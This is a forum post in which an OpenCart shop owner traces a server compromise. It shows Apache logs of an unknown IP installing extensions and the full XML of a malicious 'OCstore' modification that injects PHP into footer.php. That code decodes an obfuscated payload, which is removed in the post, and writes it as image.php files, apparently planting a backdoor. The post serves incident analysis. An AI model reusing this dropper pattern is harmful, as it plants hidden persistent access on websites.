Pretty sure I see what happened now. I have full backups of the server at random dates. I just took backups when I remembered, usually after I made progress with this OC install project. Ironically I seem to have caught this nasty script at the point where it was installed on the server through the OC extensions but before the binary was created. This is good news because it seems once the script is executed, it cleans up after itself.
From apache logs - here is me installing the file upload extension on April 4th
Code: Select all
209.59.90.220 - - [04/Apr/2019:19:48:23 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE&extension_install_id=1 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
And here is the apache log of someone else installing some other extension on April 10th
Code: Select all
193.169.87.26 - - [10/Apr/2019:15:39:50 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe&extension_install_id=2 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
193.169.87.26 - - [10/Apr/2019:15:43:08 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo&extension_install_id=3 HTTP/1.1" 200 178 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
And here is the XML for the installed extension -
Code: Select all
<?xml version="1.0" encoding="utf-8"?>
<modification>
<name><![CDATA[OCstore]]></name>
<code>OCstore</code>
<version>1.0</version>
<author>teknohiz.com</author>
<link>teknohiz.com</link>
<file path="catalog/controller/common/footer.php">
<operation error="skip">
<search><![CDATA[$data['text_newsletter'] = $this->language->get('text_newsletter');]]></search>
<add position="after"><![CDATA[
$datasss = base64_decode(gzinflate(base64_decode('
----- REMOVED ENCODED PART FOR THIS FORUM POST ---
')));
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL);
fclose($fp);
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL);
fclose($fp);
]]></add>
</operation>
<operation error="skip">
<search><![CDATA[$data['newsletter'] = $this->url->link('account/newsletter', '', true);]]></search>
<add position="after"><![CDATA[
$datasss = base64_decode(gzinflate(base64_decode('
----- REMOVED ENCODED PART FOR THIS FORUM POST ---
')));
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL);
fclose($fp);
$fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
fwrite($fp, $datasss.PHP_EOL);
fclose($fp);
]]></add>
</operation>
</file>
</modification>
So now I know this was done via the OC extensions and not via ssh/ftp/or anything else. My guess is someone/thing logged into the admin part of OC and installed this script. It wouldn't have been very hard to guess the admin password I was using, buzzing the usual passwords used would have found it. And now I'll hand this server backup off to the team that manages OC, hopefully it can be useful.